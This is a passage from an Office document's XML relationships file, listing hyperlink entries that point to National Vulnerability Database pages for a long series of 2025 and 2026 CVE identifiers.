TargetMode="External" Id="rId1942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52831" TargetMode="External" Id="rId1943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52833" TargetMode="External" Id="rId1944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53932" TargetMode="External" Id="rId1945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55277" TargetMode="External" Id="rId1946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68827" TargetMode="External" Id="rId1947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68834" TargetMode="External" Id="rId1948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68838" TargetMode="External" Id="rId1949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68876" TargetMode="External" Id="rId1950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68878" TargetMode="External" Id="rId1951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68880" TargetMode="External" Id="rId1952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68894" TargetMode="External" Id="rId1953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69271" TargetMode="External" Id="rId1954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69301" TargetMode="External" Id="rId1955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69322" TargetMode="External" Id="rId1956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69332" TargetMode="External" Id="rId1957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69346" TargetMode="External" Id="rId1958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69365" TargetMode="External" Id="rId1959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69371" TargetMode="External" Id="rId1960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69412" TargetMode="External" Id="rId1961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69418" TargetMode="External" Id="rId1962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId1963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69427" TargetMode="External" Id="rId1964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69458" TargetMode="External" Id="rId1965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69462" TargetMode="External" Id="rId1966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69481" TargetMode="External" Id="rId1967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId1968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69505" TargetMode="External" Id="rId1969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69512" TargetMode="External" Id="rId1970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69619" TargetMode="External" Id="rId1971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69623" TargetMode="External" Id="rId1972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69625" TargetMode="External" Id="rId1973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69643" TargetMode="External" Id="rId1974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69681" TargetMode="External" Id="rId1975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69689" TargetMode="External" Id="rId1976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69714" TargetMode="External" Id="rId1977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69717" TargetMode="External" Id="rId1978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId1979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69762" TargetMode="External" Id="rId1980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId1981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69777" TargetMode="External" Id="rId1982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69807" TargetMode="External" Id="rId1983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69826" TargetMode="External" Id="rId1984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69847" TargetMode="External" Id="rId1985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69875" TargetMode="External" Id="rId1986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69876" TargetMode="External" Id="rId1987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71312" TargetMode="External" Id="rId1988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76139" TargetMode="External" Id="rId1989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79755" TargetMode="External" Id="rId1990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83948" TargetMode="External" Id="rId1991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84934" TargetMode="External" Id="rId1992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84935" TargetMode="External" Id="rId1993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86140" TargetMode="External" Id="rId1994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43133" TargetMode="External" Id="rId1995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44629" TargetMode="External" Id="rId1996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6726" TargetMode="External" Id="rId1997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82636" TargetMode="External" Id="rId1998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85649" TargetMode="External" Id="rId1999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-48565" TargetMode="External" Id="rId2000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-48566" TargetMode="External" Id="rId2001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-5914" TargetMode="External" Id="rId2002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-6020" TargetMode="External" Id="rId2003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61731" TargetMode="External" Id="rId2004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-7425" TargetMode="External" Id="rId2005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0065" TargetMode="External" Id="rId2006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0084" TargetMode="External" Id="rId2007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11332" TargetMode="External" Id="rId2008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12410" TargetMode="External" Id="rId2009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15809" TargetMode="External" Id="rId2010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16826" TargetMode="External" Id="rId2011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17499" TargetMode="External" Id="rId2012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17523" TargetMode="External" Id="rId2013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19820" TargetMode="External" Id="rId2014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2050" TargetMode="External" Id="rId2015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2310" TargetMode="External" Id="rId2016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28572" TargetMode="External" Id="rId2017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28583" TargetMode="External" Id="rId2018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28590" TargetMode="External" Id="rId2019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28593" TargetMode="External" Id="rId2020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28594" TargetMode="External" Id="rId2021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28599" TargetMode="External" Id="rId2022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28600" TargetMode="External" Id="rId2023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28602" TargetMode="External" Id="rId2024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28603" TargetMode="External" Id="rId2025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28607" TargetMode="External" Id="rId2026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28611" TargetMode="External" Id="rId2027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28612" TargetMode="External" Id="rId2028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28614" TargetMode="External" Id="rId2029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28616" TargetMode="External" Id="rId2030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28620" TargetMode="External" Id="rId2031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28624" TargetMode="External" Id="rId2032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28631" TargetMode="External" Id="rId2033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28634" TargetMode="External" Id="rId2034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28636" TargetMode="External" Id="rId2035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28639" TargetMode="External" Id="rId2036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28642" TargetMode="External" Id="rId2037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28644" TargetMode="External" Id="rId2038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28650" TargetMode="External" Id="rId2039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28653" TargetMode="External" Id="rId2040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28655" TargetMode="External" Id="rId2041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28657" TargetMode="External" Id="rId2042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28658" TargetMode="External" Id="rId2043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28663" TargetMode="External" Id="rId2044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28664" TargetMode="External" Id="rId2045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28668" TargetMode="External" Id="rId2046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30512" TargetMode="External" Id="rId2047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34398" TargetMode="External" Id="rId2048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34399" TargetMode="External" Id="rId2049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45200" TargetMode="External" Id="rId2050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45515" TargetMode="External" Id="rId2051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45520" TargetMode="External" Id="rId2052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45531" TargetMode="External" Id="rId2053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45998" TargetMode="External" Id="rId2054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46117" TargetMode="External" Id="rId2055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46145" TargetMode="External" Id="rId2056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46189" TargetMode="External" Id="rId2057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48097" TargetMode="External" Id="rId2058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49360" TargetMode="External" Id="rId2059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49881" TargetMode="External" Id="rId2060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49884" TargetMode="External" Id="rId2061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49887" TargetMode="External" Id="rId2062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49918" TargetMode="External" Id="rId2063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49919" TargetMode="External" Id="rId2064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49927" TargetMode="External" Id="rId2065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49932" TargetMode="External" Id="rId2066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52489" TargetMode="External" Id="rId2067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52492" TargetMode="External" Id="rId2068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52987" TargetMode="External" Id="rId2069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53000" TargetMode="External" Id="rId2070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53009" TargetMode="External" Id="rId2071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53016" TargetMode="External" Id="rId2072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53185" TargetMode="External" Id="rId2073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54757" TargetMode="External" Id="rId2074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54758" TargetMode="External" Id="rId2075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55273" TargetMode="External" Id="rId2076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55285" TargetMode="External" Id="rId2077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55294" TargetMode="External" Id="rId2078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55426" TargetMode="External" Id="rId2079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55522" TargetMode="External" Id="rId2080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56172" TargetMode="External" Id="rId2081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56177" TargetMode="External" Id="rId2082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56198" TargetMode="External" Id="rId2083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57170" TargetMode="External" Id="rId2084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5729" TargetMode="External" Id="rId2085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58097" TargetMode="External" Id="rId2086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58599" TargetMode="External" Id="rId2087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58600" TargetMode="External" Id="rId2088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58611" TargetMode="External" Id="rId2089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58820" TargetMode="External" Id="rId2090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58823" TargetMode="External" Id="rId2091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58839" TargetMode="External" Id="rId2092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58846" TargetMode="External" Id="rId2093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58874" TargetMode="External" Id="rId2094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58941" TargetMode="External" Id="rId2095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62697" TargetMode="External" Id="rId2096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62804" TargetMode="External" Id="rId2097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62810" TargetMode="External" Id="rId2098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62886" TargetMode="External" Id="rId2099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63622" TargetMode="External" Id="rId2100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64372" TargetMode="External" Id="rId2101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64375" TargetMode="External" Id="rId2102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64377" TargetMode="External" Id="rId2103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64378" TargetMode="External" Id="rId2104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64381" TargetMode="External" Id="rId2105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67309" TargetMode="External" Id="rId2106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 